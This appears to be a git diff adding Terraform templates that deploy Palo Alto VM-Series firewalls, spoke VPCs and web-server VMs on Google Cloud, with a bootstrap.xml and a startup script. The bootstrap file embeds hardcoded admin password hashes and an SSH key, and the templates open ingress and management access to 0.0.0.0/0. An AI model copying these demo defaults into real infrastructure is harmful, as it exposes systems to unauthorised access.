+ name = "${element(var.names, count.index)}-${element(var.zones, count.index)}-ig"
+ zone = element(var.zones, count.index)
+ instances = [google_compute_instance.vmseries[count.index].self_link]
+
+ named_port {
+ name = "http"
+ port = "80"
+ }
+
+ lifecycle {
+ create_before_destroy = true
+ }
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vmseries/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/vmseries/outputs.tf
new file mode 100644
index 00000000..01e5f41b
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vmseries/outputs.tf
@@ -0,0 +1,24 @@
+output "vm_names" {
+ value = google_compute_instance.vmseries.*.name
+}
+
+output "vm_self_link" {
+ value = google_compute_instance.vmseries.*.self_link
+}
+
+output "instance_group" {
+ value = google_compute_instance_group.vmseries.*.self_link
+}
+
+output "nic0_public_ip" {
+ value = var.nic0_public_ip ? google_compute_instance.vmseries.*.network_interface.0.access_config.0.nat_ip : []
+}
+
+output "nic1_public_ip" {
+ value = var.nic1_public_ip ? google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip : []
+}
+
+output "nic2_public_ip" {
+ value = var.nic2_public_ip ? google_compute_instance.vmseries.*.network_interface.2.access_config.0.nat_ip : []
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vmseries/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/vmseries/variables.tf
new file mode 100644
index 00000000..a10b4dbe
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vmseries/variables.tf
@@ -0,0 +1,102 @@
+variable "subnetworks" {
+ type = list(string)
+}
+
+variable "names" {
+ type = list(string)
+}
+
+variable "machine_type" {
+}
+
+variable "zones" {
+ type = list(string)
+}
+
+variable "cpu_platform" {
+ default = "Intel Broadwell"
+}
+variable "disk_type" {
+ default = "pd-ssd"
+ #default = "pd-standard"
+}
+variable "bootstrap_bucket" {
+ default = ""
+}
+
+variable "ssh_key" {
+ default = ""
+}
+
+variable "public_lb_create" {
+ default = false
+}
+
+variable "scopes" {
+ type = list(string)
+
+ default = [
+ "https://www.googleapis.com/auth/compute.readonly",
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+}
+
+variable "image" {
+}
+
+variable "tags" {
+ type = list(string)
+ default = []
+}
+
+variable "create_instance_group" {
+ type = bool
+ default = false
+}
+
+variable "instance_group_names" {
+ type = list(string)
+ default = ["vmseries-instance-group"]
+}
+
+variable "dependencies" {
+ type = list(string)
+ default = []
+}
+
+variable "nic0_ip" {
+ type = list(string)
+ default = [""]
+}
+
+variable "nic1_ip" {
+ type = list(string)
+ default = [""]
+}
+
+variable "nic2_ip" {
+ type = list(string)
+ default = [""]
+}
+
+variable "mgmt_interface_swap" {
+ default = ""
+}
+
+variable "nic0_public_ip" {
+ type = bool
+ default = false
+}
+
+variable "nic1_public_ip" {
+ type = bool
+ default = false
+}
+
+variable "nic2_public_ip" {
+ type = bool
+ default = false
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vpc/main.tf b/gcp/adv_peering_4fw_2spoke/modules/vpc/main.tf
new file mode 100644
index 00000000..0c614e1d
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vpc/main.tf
@@ -0,0 +1,27 @@
+resource "google_compute_network" "default" {
+ name = var.vpc
+ delete_default_routes_on_create = var.delete_default_route
+ auto_create_subnetworks = false
+}
+
+resource "google_compute_subnetwork" "default" {
+ count = length(var.subnets)
+ name = element(var.subnets, count.index)
+ ip_cidr_range = element(var.cidrs, count.index)
+ region = element(var.regions, count.index)
+ network = google_compute_network.default.self_link
+}
+
+resource "google_compute_firewall" "default" {
+ count = length(var.allowed_sources) != 0 ? 1 : 0
+ name = "${google_compute_network.default.name}-ingress"
+ network = google_compute_network.default.self_link
+ direction = "INGRESS"
+ source_ranges = var.allowed_sources
+
+ allow {
+ protocol = var.allowed_protocol
+ ports = var.allowed_ports
+ }
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vpc/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/vpc/outputs.tf
new file mode 100644
index 00000000..e92488eb
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vpc/outputs.tf
@@ -0,0 +1,24 @@
+output "subnetwork_id" {
+ value = google_compute_subnetwork.default.*.id
+}
+
+output "subnetwork_name" {
+ value = google_compute_subnetwork.default.*.name
+}
+
+output "subnetwork_self_link" {
+ value = google_compute_subnetwork.default.*.self_link
+}
+
+output "vpc_name" {
+ value = google_compute_network.default.*.name
+}
+
+output "vpc_id" {
+ value = google_compute_network.default.*.id[0]
+}
+
+output "vpc_self_link" {
+ value = google_compute_network.default.*.self_link[0]
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vpc/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/vpc/variables.tf
new file mode 100644
index 00000000..faccda44
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vpc/variables.tf
@@ -0,0 +1,33 @@
+variable "vpc" {
+}
+
+variable "subnets" {
+ type = list(string)
+}
+
+variable "cidrs" {
+ type = list(string)
+}
+
+variable "regions" {
+ type = list(string)
+}
+
+variable "allowed_sources" {
+ type = list(string)
+ default = []
+}
+
+variable "allowed_protocol" {
+ default = "all"
+}
+
+variable "allowed_ports" {
+ type = list(string)
+ default = []
+}
+
+variable "delete_default_route" {
+ default = "false"
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/outputs.tf b/gcp/adv_peering_4fw_2spoke/outputs.tf
new file mode 100644
index 00000000..e81fb61e
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/outputs.tf
@@ -0,0 +1,30 @@
+#-----------------------------------------------------------------------------------------------
+# Outputs
+output "GLB-ADDR" {
+ value = "http://${module.glb.address}"
+}
+
+output "MGMT-FW1" {
+ value = "https://${module.fw_inbound.nic1_public_ip[0]}"
+}
+
+output "MGMT-FW2" {
+ value = "https://${module.fw_inbound.nic1_public_ip[1]}"
+}
+
+output "MGMT-FW3" {
+ value = "https://${module.fw_outbound.nic1_public_ip[0]}"
+}
+
+output "MGMT-FW4" {
+ value = "https://${module.fw_outbound.nic1_public_ip[1]}"
+}
+
+output "SSH-TO-SPOKE1" {
+ value = "ssh ${var.spoke_user}@${module.fw_inbound.nic0_public_ip[0]} -p 221 -i ${replace(var.public_key_path, ".pub", "")}"
+}
+
+output "SSH-TO-SPOKE2" {
+ value = "ssh ${var.spoke_user}@${module.fw_inbound.nic0_public_ip[0]} -p 222 -i ${replace(var.public_key_path, ".pub", "")}"
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/project.tf b/gcp/adv_peering_4fw_2spoke/project.tf
new file mode 100644
index 00000000..835af2dc
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/project.tf
@@ -0,0 +1,18 @@
+terraform {
+ required_version = ">= 0.12"
+}
+
+provider "google" {
+ # credentials = var.auth_file
+ project = var.project_id
+ region = var.region
+}
+
+provider "google-beta" {
+ # credentials = var.auth_file
+ project = var.project_id
+ region = var.region
+ version = "> 2.13.0"
+}
+
+data "google_compute_zones" "available" {}
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php b/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php
new file mode 100644
index 00000000..19c37318
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php
@@ -0,0 +1,62 @@
+
+ SOURCE & DESTINATION ADDRESSES
+ ';
+echo ''. "INTERVAL" .': '. $time .' ';
+$localIPAddress = getHostByName(getHostName());
+$sourceIPAddress = getRealIpAddr();
+echo ''. "SOURCE IP" .': '. $sourceIPAddress .' ';
+echo ''. "LOCAL IP" .': '. $localIPAddress .' ';
+
+$vm_name = gethostname();
+echo ''. "VM NAME" .': '. $vm_name .' ';
+echo ''. ' ';
+echo '
+ HEADER INFORMATION
+ ';
+/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */
+foreach ($_SERVER as $header => $value) {
+ if (substr($header, 0, 5) == 'HTTP_') {
+ /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */
+ $clean_header = strtolower(substr($header, 5, strlen($header)));
+
+ /* Replace underscores by the dashes, as the browser sends them */
+ $clean_header = str_replace('_', '-', $clean_header);
+
+ /* Cleanup: standard headers are first-letter uppercase */
+ $clean_header = ucwords($clean_header, " \t\r\n\f\v-");
+
+ /* And show'm */
+ echo ''. $header .': '. $value .' ';
+ }
+}
+?>
diff --git a/gcp/adv_peering_4fw_2spoke/scripts/webserver-startup.sh b/gcp/adv_peering_4fw_2spoke/scripts/webserver-startup.sh
new file mode 100644
index 00000000..94f78467
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/scripts/webserver-startup.sh
@@ -0,0 +1,8 @@
+#!/bin/bash
+until sudo apt-get update; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y apache2; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 2; done
+until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done
+until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done
+until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/spokes.tf b/gcp/adv_peering_4fw_2spoke/spokes.tf
new file mode 100644
index 00000000..ce369362
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/spokes.tf
@@ -0,0 +1,112 @@
+#-----------------------------------------------------------------------------------------------
+# Create spoke1 vpc with 2 web VMs (with internal LB). Create peer link with trust VPC.
+module "vpc_spoke1" {
+ source = "./modules/vpc/"
+ vpc = var.spoke1_vpc
+ subnets = var.spoke1_subnets
+ cidrs = var.spoke1_cidrs
+ regions = [var.region]
+ allowed_sources = ["0.0.0.0/0"]
+ delete_default_route = true
+}
+
+module "vm_spoke1" {
+ source = "./modules/vm/"
+ names = var.spoke1_vms
+ zones = [
+ data.google_compute_zones.available.names[0],
+ data.google_compute_zones.available.names[1]
+ ]
+ subnetworks = [module.vpc_spoke1.subnetwork_self_link[0]]
+ machine_type = "f1-micro"
+ image = "ubuntu-os-cloud/ubuntu-1604-lts"
+ create_instance_group = true
+ ssh_key = fileexists(var.public_key_path) ? "${var.spoke_user}:${file(var.public_key_path)}" : ""
+ startup_script = file("${path.module}/scripts/webserver-startup.sh")
+}
+
+module "ilb_web" {
+ source = "./modules/ilb/"
+ name = var.spoke1_ilb
+ subnetworks = [module.vpc_spoke1.subnetwork_self_link[0]]
+ all_ports = false
+ ports = ["80"]
+ health_check_port = "80"
+ ip_address = var.spoke1_ilb_ip
+ backends = {
+ "0" = [
+ {
+ group = module.vm_spoke1.instance_group[0]
+ failover = false
+ },
+ {
+ group = module.vm_spoke1.instance_group[1]
+ failover = false
+ }
+ ]
+ }
+ providers = {
+ google = google-beta
+ }
+}
+
+resource "google_compute_network_peering" "trust_to_spoke1" {
+ name = "${var.trust_vpc}-to-${var.spoke1_vpc}"
+ provider = google-beta
+ network = module.vpc_trust.vpc_self_link
+ peer_network = module.vpc_spoke1.vpc_self_link
+ export_custom_routes = true
+}
+
+resource "google_compute_network_peering" "spoke1_to_trust" {
+ name = "${var.spoke1_vpc}-to-${var.trust_vpc}"
+ provider = google-beta
+ network = module.vpc_spoke1.vpc_self_link
+ peer_network = module.vpc_trust.vpc_self_link
+ import_custom_routes = true
+
+ depends_on = [google_compute_network_peering.trust_to_spoke1]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create spoke2 vpc with VM. Create peer link with trust VPC.
+module "vpc_spoke2" {
+ source = "./modules/vpc/"
+ vpc = var.spoke2_vpc
+ subnets = var.spoke2_subnets
+ cidrs = var.spoke2_cidrs
+ regions = [var.region]
+ allowed_sources = ["0.0.0.0/0"]
+ delete_default_route = true
+}
+
+module "vm_spoke2" {
+ source = "./modules/vm/"
+ names = var.spoke2_vms
+ zones = [data.google_compute_zones.available.names[0]]
+ machine_type = "f1-micro"
+ image = "ubuntu-os-cloud/ubuntu-1604-lts"
+ subnetworks = [module.vpc_spoke2.subnetwork_self_link[0]]
+ ssh_key = fileexists(var.public_key_path) ? "${var.spoke_user}:${file(var.public_key_path)}" : ""
+}
+
+resource "google_compute_network_peering" "trust_to_spoke2" {
+ name = "${var.trust_vpc}-to-${var.spoke2_vpc}"
+ provider = google-beta
+ network = module.vpc_trust.vpc_self_link
+ peer_network = module.vpc_spoke2.vpc_self_link
+ export_custom_routes = true
+
+ depends_on = [google_compute_network_peering.spoke1_to_trust]
+}
+
+resource "google_compute_network_peering" "spoke2_to_trust" {
+ name = "${var.spoke2_vpc}-to-${var.trust_vpc}"
+ provider = google-beta
+ network = module.vpc_spoke2.vpc_self_link
+ peer_network = module.vpc_trust.vpc_self_link
+ import_custom_routes = true
+
+ depends_on = [google_compute_network_peering.trust_to_spoke2]
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/terraform.tfvars b/gcp/adv_peering_4fw_2spoke/terraform.tfvars
new file mode 100644
index 00000000..df20d345
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/terraform.tfvars
@@ -0,0 +1,44 @@
+#project_id = ""
+#public_key_path = "~/.ssh/gcp-demo.pub"
+
+#fw_panos = "byol-904"
+#fw_panos = "bundle1-904"
+#fw_panos = "bundle2-904"
+
+
+#-------------------------------------------------------------------
+region = "us-east4"
+
+mgmt_vpc = "mgmt-vpc"
+mgmt_subnet = ["mgmt"]
+mgmt_cidr = ["192.168.0.0/24"]
+mgmt_sources = ["0.0.0.0/0"]
+
+untrust_vpc = "untrust-vpc"
+untrust_subnet = ["untrust"]
+untrust_cidr = ["192.168.1.0/24"]
+
+trust_vpc = "trust-vpc"
+trust_subnet = ["trust"]
+trust_cidr = ["192.168.2.0/24"]
+
+spoke1_vpc = "spoke1-vpc"
+spoke1_subnets = ["spoke1-subnet1"]
+spoke1_cidrs = ["10.10.1.0/24"]
+spoke1_vms = ["spoke1-vm1", "spoke1-vm2"]
+spoke1_ilb = "spoke1-ilb"
+spoke1_ilb_ip = "10.10.1.100"
+
+spoke2_vpc = "spoke2-vpc"
+spoke2_subnets = ["spoke2-subnet1"]
+spoke2_cidrs = ["10.10.2.0/24"]
+spoke2_vms = ["spoke2-vm1"]
+spoke_user = "demo"
+
+fw_names_inbound = ["vmseries01", "vmseries02"]
+fw_names_outbound = ["vmseries03", "vmseries04"]
+fw_machine_type = "n1-standard-4"
+
+glb_name = "vmseries-glb"
+ilb_name = "vmseries-ilb"
+
diff --git a/gcp/adv_peering_4fw_2spoke/variables.tf b/gcp/adv_peering_4fw_2spoke/variables.tf
new file mode 100644
index 00000000..780f0a40
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/variables.tf
@@ -0,0 +1,116 @@
+variable "project_id" {
+ description = "GCP Project ID"
+}
+
+# variable "auth_file" {
+# description = "GCP Project auth file"
+# }
+
+variable "region" {
+}
+
+variable "fw_panos" {
+ description = "VM-Series license and PAN-OS (ie: bundle1-814, bundle2-814, or byol-814)"
+}
+
+variable "fw_image" {
+ default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries"
+}
+
+variable "fw_names_inbound" {
+ type = list(string)
+}
+
+variable "fw_names_outbound" {
+ type = list(string)
+}
+
+variable "fw_machine_type" {
+}
+
+variable "glb_name" {
+}
+
+variable "ilb_name" {
+}
+
+variable "mgmt_vpc" {
+}
+
+variable "mgmt_subnet" {
+ type = list(string)
+}
+
+variable "mgmt_cidr" {
+ type = list(string)
+}
+
+variable "untrust_vpc" {
+}
+
+variable "untrust_subnet" {
+ type = list(string)
+}
+
+variable "untrust_cidr" {
+ type = list(string)
+}
+
+variable "trust_vpc" {
+}
+
+variable "trust_subnet" {
+ type = list(string)
+}
+
+variable "trust_cidr" {
+ type = list(string)
+}
+
+variable "mgmt_sources" {
+ type = list(string)
+}
+
+variable "spoke1_vpc" {
+}
+
+variable "spoke1_subnets" {
+ type = list(string)
+}
+
+variable "spoke1_cidrs" {
+ type = list(string)
+}
+
+variable "spoke1_vms" {
+ type = list(string)
+}
+
+variable "spoke1_ilb" {
+}
+
+variable "spoke1_ilb_ip" {
+}
+
+variable "spoke2_vpc" {
+}
+
+variable "spoke2_subnets" {
+ type = list(string)
+}
+
+variable "spoke2_cidrs" {
+ type = list(string)
+}
+
+variable "spoke2_vms" {
+ type = list(string)
+}
+
+variable "spoke_user" {
+ description = "SSH user for spoke Linux VM"
+}
+
+variable "public_key_path" {
+ description = "Local path to public SSH key. If you do not have a public key, run >> ssh-keygen -f ~/.ssh/demo-key -t rsa -C admin"
+}
diff --git a/gcp/gcp-ilbnh/README.md b/gcp/gcp-ilbnh/README.md
new file mode 100644
index 00000000..904ccc45
--- /dev/null
+++ b/gcp/gcp-ilbnh/README.md
@@ -0,0 +1,22 @@
+# gcp-ilbnh
+ILB as next hop in GCP\
+This repository is intended to be used in conjunction with the 2-spoke advanced peering demo template:
+
+https://github.com/wwce/terraform/tree/master/gcp/adv_peering_2fw_2spoke
+
+This template may be used simultaneously with, or subsequent to, the advanced peering template. It creates an additional pair of firewalls behind an internal load balancer that can be used for outbound load balancing of TCP-only traffic, providing redundancy for outbound connectivity.
+
+ILB as next hop is not currently GA. Consequently, routes will need to be modified post-deployment with the following gcloud CLI command:
+
+gcloud beta compute routes create default-ilbnh \\ \
+--network=trust-vpc \\ \
+--destination-range=0.0.0.0/0 \\ \
+--next-hop-ilb=ilbnh-all \\ \
+--next-hop-ilb-region=<region> \\ \
+--priority=99
+
+N.B. - This template was developed/tested using Terraform 0.11.
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/gcp/gcp-ilbnh/bootstrap_files_ilbnh/authcodes b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/authcodes
new file mode 100644
index 00000000..0519ecba
--- /dev/null
+++ b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/authcodes
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/gcp/gcp-ilbnh/bootstrap_files_ilbnh/bootstrap.xml b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/bootstrap.xml
new file mode 100644
index 00000000..9f506a10
--- /dev/null
+++ b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/bootstrap.xml
@@ -0,0 +1,632 @@
+
+
+
+
+
+ $1$eyegmtyu$VFbNwpbaZ8sUG40wpdo/A/
+
+
+ yes
+
+
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u
+
+
+
+
+ yes
+
+
+ $1$xxqwnwvr$El9XN5KexgoltjkVjbkcd0
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 10
+
+
+ yes
+ 5
+
+
+
+ yes
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+
+
+ 100
+ yes
+
+
+
+
+
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ health-check
+
+
+
+
+
+
+
+ 3
+ 5
+ wait-recover
+
+
+
+
+ no
+ yes
+
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+
+ 8
+
+
+
+
+ aes-128-cbc
+
+
+ sha256
+
+
+ group19
+
+
+ 8
+
+
+
+
+ aes-256-cbc
+
+
+ sha384
+
+
+ group20
+
+
+ 8
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+ 1
+
+
+
+
+
+ aes-128-gcm
+
+
+ none
+
+
+ group19
+
+ 1
+
+
+
+
+
+ aes-256-gcm
+
+
+ none
+
+
+ group20
+
+ 1
+
+
+
+
+
+
+ aes-128-cbc
+
+
+ sha1
+
+
+
+
+
+
+
+
+
+
+ real-time
+
+
+ high
+
+
+ high
+
+
+ medium
+
+
+ medium
+
+
+ low
+
+
+ low
+
+
+ low
+
+
+
+
+
+
+
+
+
+ no
+
+
+ 1.25
+ 0.5
+ 900
+ 300
+ 900
+ yes
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+ ethernet1/1
+ ethernet1/2
+ loopback.1
+
+
+
+
+
+
+
+
+
+
+
+ 192.168.2.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/1
+ 10
+ 35.191.0.0/16
+
+
+
+
+
+
+ 192.168.2.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/1
+ 10
+ 130.211.0.0/22
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ 192.168.2.1
+
+
+ None
+
+ ethernet1/1
+ 10
+ 10.10.1.0/24
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ 192.168.2.1
+
+
+ None
+
+ ethernet1/1
+ 10
+ 10.10.2.0/24
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ no
+ yes
+ no
+
+
+ updates.paloaltonetworks.com
+
+
+
+
+ wednesday
+ 01:02
+ download-only
+
+
+
+
+ US/Pacific
+
+ yes
+ yes
+
+ PA-VM
+
+
+
+ yes
+
+
+ FQDN
+
+
+
+ yes
+ no
+ yes
+ no
+
+
+ 8.8.8.8
+ 4.2.2.2
+ mgmt-interface-swap
+
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/1
+ loopback.1
+
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+
+
+
+
+
+
+
+
+ untrust
+
+
+ trust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+ allow
+
+
+
+ trust
+
+
+ trust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+ allow
+ universal
+
+
+
+
+
+
+ drop
+ no
+ yes
+
+
+ deny
+ no
+ yes
+
+
+
+
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+ untrust
+
+
+ trust
+
+
+
+ any
+
+ any
+
+
+
+ trust
+
+
+ trust
+
+
+
+ any
+
+ any
+ ethernet1/1
+
+ 100.64.0.1
+
+
+
+
+
+
+
+
+ ethernet1/1
+ ethernet1/2
+ loopback.1
+
+
+
+
+
+
+
+
diff --git a/gcp/gcp-ilbnh/bootstrap_files_ilbnh/init-cfg.txt b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/init-cfg.txt
new file mode 100644
index 00000000..8d3c0290
--- /dev/null
+++ b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
+op-command-modes=mgmt-interface-swap
\ No newline at end of file
diff --git a/gcp/gcp-ilbnh/ilbnh.tf b/gcp/gcp-ilbnh/ilbnh.tf
new file mode 100644
index 00000000..45879ab7
--- /dev/null
+++ b/gcp/gcp-ilbnh/ilbnh.tf
@@ -0,0 +1,66 @@
+provider "google" {
+ credentials = "${var.main_project_authfile}"
+ project = "${var.main_project}"
+ region = "${var.region}"
+ alias = "ilbnh"
+}
+#************************************************************************************
+# CREATE GCP BUCKET FOR VMSERIES BOOTSTRAP - ILBNH
+#************************************************************************************
+module "bootstrap_ilbnh" {
+ source = "./modules/create_bootstrap_bucket_ilbnh/"
+ bucket_name = "vmseries-ilbnh"
+ randomize_bucket_name = true
+ file_location = "bootstrap_files_ilbnh/"
+ enable_ilbnh = "${var.enable_ilbnh}"
+ config = ["init-cfg.txt", "bootstrap.xml"] // default []
+ license = ["authcodes"] // default []
+ # content = ["panupv2-all-contents-8133-5346", "panup-all-antivirus-2917-3427", "panupv2-all-wildfire-331212-333889"] // default []
+ # software = ["PanOS_vm-9.0.0"] // default []
+}
+
+#************************************************************************************
+# CREATE 2xVMSERIES FIREWALL W/ 3 NICS (MGMT VPC, UNTRUST VPC, TRUST VPC) - ILBNH
+#************************************************************************************
+module "vm_fw_ilbnh" {
+ source = "./modules/create_vmseries_ilbnh/"
+ fw_names = ["vmseries03", "vmseries04"]
+ fw_machine_type = "n1-standard-4"
+ fw_zones = ["${var.region}-a", "${var.region}-b"]
+ fw_subnetworks = ["${module.vpc_trust.subnetwork_self_link[0]}", "${module.vpc_mgmt.subnetwork_self_link[0]}", "${module.vpc_untrust.subnetwork_self_link[0]}"]
+ enable_ilbnh = "${var.enable_ilbnh}"
+ fw_nic0_ip = ["192.168.2.4", "192.168.2.5"] // default [""] - enables dynamically assigned IP
+ fw_nic1_ip = ["192.168.0.4", "192.168.0.5"]
+ fw_nic2_ip = ["192.168.1.4", "192.168.1.5"]
+
+ fw_bootstrap_bucket = "${module.bootstrap_ilbnh.bucket_name}"
+ fw_ssh_key = "admin:${var.vmseries_ssh_key}"
+ fw_image = "${var.vmseries_image}"
+
+ create_instance_group = true
+ instance_group_names = ["vmseries03-ig", "vmseries04-ig"] // default "vmseries-instance-group"
+
+ dependencies = [
+ "${module.bootstrap_ilbnh.completion}",
+ ]
+}
+
+#************************************************************************************
+# CREATE VMSERIES INTERNAL LOAD BALANCER - ILBNH
+#************************************************************************************
+module "vmseries_internal_lb_ilbnh" {
+ source = "./modules/create_ilbnh/"
+ internal_lb_name_ilbnh = "ilbnh"
+ internal_lb_ports_ilbnh = "22"
+ subnetworks = ["${module.vpc_trust.subnetwork_self_link[0]}"]
+ internal_lbnh_ip = "192.168.2.6"
+ enable_ilbnh = "${var.enable_ilbnh}"
+ backends = [
+ {
+ group = "${module.vm_fw_ilbnh.instance_group[0]}"
+ },
+ {
+ group = "${module.vm_fw_ilbnh.instance_group[1]}"
+ },
+ ]
+}
diff --git a/gcp/gcp-ilbnh/ilbnh_override.tf b/gcp/gcp-ilbnh/ilbnh_override.tf
new file mode 100644
index 00000000..d3bb02dd
--- /dev/null
+++ b/gcp/gcp-ilbnh/ilbnh_override.tf
@@ -0,0 +1,7 @@
+#************************************************************************************
+# ILBNH
+#************************************************************************************
+variable "enable_ilbnh" {
+ description = "If set to true, enable ILB as Next Hop"
+ default = true
+}
diff --git a/gcp/gcp-ilbnh/modules/create_bootstrap_bucket_ilbnh/main.tf b/gcp/gcp-ilbnh/modules/create_bootstrap_bucket_ilbnh/main.tf
new file mode 100644
index 00000000..23092e2b
--- /dev/null
+++ b/gcp/gcp-ilbnh/modules/create_bootstrap_bucket_ilbnh/main.tf
@@ -0,0 +1,124 @@
+variable enable_ilbnh {
+ default = false
+}
+variable bucket_name {}
+
+variable file_location {}
+
+variable config {
+ type = "list"
+ default = []
+}
+
+variable content {
+ type = "list"
+ default = []
+}
+
+variable license {
+ type = "list"
+ default = []
+}
+
+variable software {
+ default = []
+}
+
+variable randomize_bucket_name {
+ default = false
+}
+
+locals {
+ bucket_name = "${var.randomize_bucket_name ? join("", list(var.bucket_name, random_string.randomstring.result)) : var.bucket_name}"
+}
+
+resource "random_string" "randomstring" {
+ count = "${var.randomize_bucket_name}"
+ length = 25
+ min_lower = 15
+ min_numeric = 10
+ special = false
+}
+
+resource "google_storage_bucket" "bootstrap" {
+ count = "${var.enable_ilbnh ? 1 : 0}"
+ name = "${local.bucket_name}"
+ force_destroy = true
+}
+
+resource "google_storage_bucket_object" "config_full" {
+ count = "${(length(var.config) > 0 && var.enable_ilbnh) ? length(var.config) : "0" }"
+ name = "config/${element(var.config, count.index)}"
+ source = "${var.file_location}${element(var.config, count.index)}"
+ bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "content_full" {
+ count = "${(length(var.content) > 0 && var.enable_ilbnh) ? length(var.content) : "0" }"
+ name = "content/${element(var.content, count.index)}"
